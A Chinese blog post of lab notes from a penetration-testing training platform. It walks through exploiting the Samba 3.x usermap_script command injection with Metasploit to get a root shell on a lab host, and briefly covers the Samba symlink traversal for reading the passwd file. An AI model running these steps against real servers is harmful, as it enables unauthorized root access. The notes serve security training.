samba 3.x提权漏洞

声明:以下内容均来自“实验吧”免费公益渗透平台,该平台至今仍旧在维护,估计~~,为此把以前保留的笔记拿来分享下。

[实验目的]

   1) 利用Samba漏洞,获得目标主机root权限

[实验原理]

   1) Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh.如果再调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了而已输入的话,就可能允许攻击者以nobody用户的权限执行任意命令.Samba服务端口:139\445.

[实验环境]

[实验步骤]

一、利用nmap工具扫描目标主机

1.1 在终端中输入命令"nmap -sV 192.168.1.3”, 对目标主机进行端口扫描,发现开放445端口、139端口并且安装samba软件。版本为3.x(注意此攻击也就适用于攻击3版本)
 

1.2 在终端中输入命令"msfconsole" , 启动MSF终端。

1.3 在终端中输入命令"search samba”, 搜索samba的相关I具和攻击载荷。

1.4 在终端中输入命令"use exploit/multi/samba/usermap_script" , 启用漏洞利用模块,提示符就会提示进入到该路径下。

1.5 在终端中输入命令"info” , 查看需要设置的相关项,"yes" 表示必须填写的参数。

#用命令show options看到更清楚

1.6 在终端中输入命令"set RHOST 192.168.1.3”, 设置目标主机的IP地址。

1.7 在终端中输入"exploit" 开始向目标 主机攻击,攻击成功后 ,建立会话。

1.8 在终端中输入,'whoami" ,查看获得的权限为root ,输入命令"ifconfig" ,查看系统的网络信息。



补充说明:

Metasploit溢出sysmlink 默认配置目录遍历漏洞,这个也是samba 3.x漏洞,具体过程自行百度:

其实验目的是:
1)利用sysmlink漏洞读取目标主机的passwd文件内容。
其实验原理是:
1) Samba是一套实现SMB ( server messages block )协议,跨平台进行文件共享和打印共享服务的程序, samba的sambd默认配置在可写文件共享时,存在目录遍历漏洞,远程用户可以通过smbclient端使用一
个对称命,创建-个包含. 的目录遍历符的软连接,可以进行目录遍历以及访问任意文件。

 

 

  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值